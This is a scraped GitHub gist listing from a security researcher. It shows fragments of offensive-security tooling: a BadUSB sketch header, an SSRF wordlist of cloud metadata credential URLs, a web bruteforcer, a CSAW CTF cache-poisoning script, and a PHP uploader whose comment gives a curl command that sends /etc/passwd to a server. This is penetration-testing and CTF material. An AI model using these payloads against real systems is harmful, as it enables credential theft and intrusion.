Skip to content

Instantly share code, notes, and snippets.

Aseem Shrey LuD1161

Block or report user

Report or block LuD1161

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@LuD1161
LuD1161 / notes-null-talk.txt
Last active Jun 2, 2019
Notes of Null talk on BadUSB
View notes-null-talk.txt
## Bad USB code
#include "DigiKeyboard.h"
#define WorkingPin 1 // Just as an LED indicator, as to when the work is finished
void setup() {
}
void loop() {
@LuD1161
LuD1161 / requests-through-tor.py
Created May 21, 2019
Sending request through socks proxy
View requests-through-tor.py
"""
Taken from :
https://medium.com/@jasonrigden/using-tor-with-the-python-request-library-79015b2606cb
and
https://www.linuxuprising.com/2018/10/how-to-install-and-use-tor-as-proxy-in.html
script : install-tor.sh
sudo apt install apt-transport-https curl
sudo -i
@LuD1161
LuD1161 / cloud_metadata.txt
Created Jan 11, 2019 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
@LuD1161
LuD1161 / bruteforcer.py
Created Jan 5, 2019
Bruteforcer for web requests
View bruteforcer.py
import asyncio
from aiohttp import ClientSession
import json
headers = {
'Content-Type': 'application/json',
'Charset': 'UTF-8',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36',
} # Change the headers accordingly
@LuD1161
LuD1161 / multiple-targets.sh
Created Oct 10, 2018
Multiple Targets for the master script
View multiple-targets.sh
#!/bin/bash
if [ -z "$1" ]
then
echo "Target file not specified"
echo "Usage : ./multiple-targets.sh file_name"
exit 1
fi
for target in $(cat $1);
@LuD1161
LuD1161 / upload.php
Last active Sep 30, 2018
Uploader script
View upload.php
<!DOCTYPE html>
<html>
<head>
<title>Upload your files</title>
</head>
<body>
<h1> Make sure you've set the right permissions for your "uploads" directory i.e. chmod -R 777 uploads </h1>
<h2>For curl command : curl -F "uploaded_file=@/etc/passwd" http://server_ip/path_to_this_script/upload.php </h2>
<form enctype="multipart/form-data" method="POST">
<p>Upload your file</p>
@LuD1161
LuD1161 / app.js
Created Sep 17, 2018
Files for Hacker Movie Club Challenge - CSAW Quals 2018
View app.js
var token = null;
Promise.all([
fetch('/api/movies').then(r=>r.json()),
fetch(`//3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/main.mst`).then(r=>r.text()),
new Promise((resolve) => {
if (window.loaded_recapcha === true)
return resolve();
window.loaded_recapcha = resolve;
}),
@LuD1161
LuD1161 / poison.py
Created Sep 17, 2018
poison.py - Hacker Movie Club ( Web challenge ) CSAW 2018
View poison.py
from time import sleep
import requests
import webbrowser
X_Forwarded_Host = 'my_server'
while True:
resp = requests.get("http://3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/app.js", headers={'X-Forwarded-Host': X_Forwarded_Host})
print resp.headers
sleep(0.5)
@LuD1161
LuD1161 / .myprompt.sh
Last active Feb 6, 2019
My Bash Prompt
View .myprompt.sh
#!/bin/bash
#=========================================================
#Terminal Color Codes
#=========================================================
WHITE='\[\033[1;37m\]'
LIGHTGRAY='\[\033[0;37m\]'
GRAY='\[\033[1;30m\]'
BLACK='\[\033[0;30m\]'
RED='\[\033[0;31m\]'
View findFile.py
"""
A horrible script, however gets things done ;)
USE CASE : If file encrypted with simple xor
Enter expected key, can be file format's hex
It will automatically find the key based on that header
And write out a new file out of it
"""
You can’t perform that action at this time.